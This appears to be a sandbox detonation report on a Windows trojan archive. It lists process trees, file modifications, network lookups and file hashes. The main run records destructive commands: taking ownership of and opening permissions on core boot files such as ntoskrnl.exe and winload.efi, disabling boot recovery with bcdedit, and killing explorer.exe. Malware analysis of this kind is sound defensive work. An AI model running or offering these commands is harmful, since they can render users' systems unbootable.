File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\OneNotePageSmallTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\OneNoteSectionLargeTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~1\ExchangeMediumTile.scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI97D5~1.SCA\Assets\Images\Ratings\Yelp3.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~3.0_X\MICROS~1.ADV\bootstrap.js C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~1\HxCalendarAppList.scale-150.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~2\HxMailLargeTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Themes\Jumbo\jumbo_cardback.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\TEXTUR~1\droplets.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\Contrast\CONTRA~2\BuilderLogo.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI5B43~1.0_X\Assets\CONTRA~2\OneConnectAppList.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Designs\EMOTIC~1\large\cash.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0911~1.0_X\LUMIA~1.VIE\Assets\IconOpenInRefocus.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~2\OneNoteAppList.targetsize-64_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\MAINPA~1\pyramid_bp_920.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Assets\Images\IncomingCallBrandingImage.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Designs\EMOTIC~1\large\dancing.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0911~1.0_X\Assets\PhotosAppList.targetsize-64_altform-fullcolor.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0679~1.SCA\Assets\GamesXboxHubSmallTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MID8A2~1.SCA\Assets\CONTRA~1\AppPackageLargeTile.scale-125_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI4B57~1.SCA\Assets\CalculatorAppList.contrast-black_scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI4C3B~1.SCA\Assets\VoiceRecorderAppList.contrast-black_scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~4.0_X\Assets\AppTiles\WEATHE~1\30x30\69.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB044~1.SCA\AppxManifest.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\2494_48x48x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI101B~1.0_X\Assets\AppTiles\CONTRA~1\StoreAppList.targetsize-80.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Designs\Flags\large\sg_60x42.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~2\OneNoteAppList.targetsize-256_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI354C~1.SCA\AppxManifest.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE03D~1.0_X\Microsoft.Apps.Messaging.Base.winmd C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI79E2~1.0_X\Content\SURFAC~1\en-US\doc_offline_getconnected.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\1850_32x32x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI691C~1.0_X\Assets\FileExtension.targetsize-40.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\TEXTUR~1\denim.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\Workflow\Icon_Materials.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI41D1~1.0_X\Assets\complete.contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MID550~1.SCA\Assets\SECOND~1\Home\SmallTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIAF54~1.SCA\AppxManifest.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC949~1.SCA\Assets\GamesXboxHubLargeTile.scale-200_contrast-high.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Themes\Autumn\autumn_13c.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~2\OneNoteAppList.targetsize-48_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI169C~1.SCA\Assets\CalculatorSplashScreen.contrast-black_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI9599~1.0_X\Assets\WINDOW~1\WindowsCameraSplashScreen.contrast-white_scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\6365_36x36x32.png C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\system32\mspaint.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe C:\Windows\system32\cmd.exe
PID 2908 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe C:\Windows\system32\cmd.exe
PID 2480 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 1484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 1484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2480 wrote to memory of 656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2480 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2480 wrote to memory of 4340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 4340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2480 wrote to memory of 664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2480 wrote to memory of 664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2480 wrote to memory of 512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2480 wrote to memory of 512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2480 wrote to memory of 4824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mspaint.exe
PID 2480 wrote to memory of 4824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mspaint.exe
PID 2480 wrote to memory of 1836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 2480 wrote to memory of 1836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\759D.tmp\759E.tmp\759F.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ntoskrnl.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\hal.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\hal.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ci.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ci.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\winload.efi"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\winload.efi" /grant everyone:F

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\WindowsApps"

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\WindowsApps" /grant everyone:F

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\cmd.exe

cmd.exe

C:\Windows\system32\mspaint.exe

mspaint.exe

C:\Windows\system32\notepad.exe

notepad.exe

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\759D.tmp\759E.tmp\759F.bat

MD5 fdc1bd905021633dfd77610ba86f7663
SHA1 101d7151ce4993d4f314ac2e837a9f9292846cb5
SHA256 439296ca854b289a4edb016c1ae4c37caeecd23bed10e512fc8b45c4259de9f8
SHA512 b6e6ec61cfae62c9e19e3882562e4f5ac0a53ade92d29e5cd5029e80b0a6462b09e7554493b50487cf7a18cabd823de297b8851b02677d5753eec9fee903653e

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

129s

Max time network

140s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\README.md

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\README.md

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\URDED.txt

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\URDED.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

135s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\info.txt

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\info.txt

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:17

Platform

win10-20240611-en

Max time kernel

84s

Max time network

90s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe"

Signatures

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4584 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe C:\Windows\system32\wscript.exe
PID 4584 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe C:\Windows\system32\wscript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\E753.tmp\E754.tmp\E755.vbs //Nologo

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\E753.tmp\E754.tmp\E755.vbs

MD5 82455ed5816ace2c6842dc84cb620b37
SHA1 cade773fe4a7bc311a08829f3b38e08ae7c1415a
SHA256 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e
SHA512 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:31

Platform

win10-20240404-en

Max time kernel

41s

Max time network

109s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msg.bat"

Signatures

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msg.bat"

C:\Windows\system32\osk.exe

"C:\Windows\system32\osk.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2e0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{60A90A2F-858D-42AF-8929-82BE9D99E8A1}

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8d25d9758,0x7ff8d25d9768,0x7ff8d25d9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1832 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2908 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2916 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4504 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4776 --field-trial-handle=1880,i,2578074516539598026,7054422846292630558,131072 /prefetch:8

C:\Windows\system32\wininit.exe

"C:\Windows\system32\wininit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp

Files

memory/2496-8-0x00000213D6900000-0x00000213D6922000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcfqytit.vky.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2496-35-0x00000213D7040000-0x00000213D707C000-memory.dmp

memory/2496-46-0x00000213D7100000-0x00000213D7176000-memory.dmp

\??\pipe\crashpad_4972_WJFDMAANEBUCQDVY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

133s

Max time network

135s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

135s

Max time network

137s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\user.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\user.png

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 78.239.69.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

133s

Max time network

135s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

135s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\about.txt

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\about.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

136s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\guest.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\guest.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

135s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\guest.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\guest.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

90s

Max time network

81s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2736 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2736 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2736 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2736 wrote to memory of 4232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 2736 wrote to memory of 4232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.bat"

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\notepad.exe

notepad sources\URDED.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

135s

Command Line

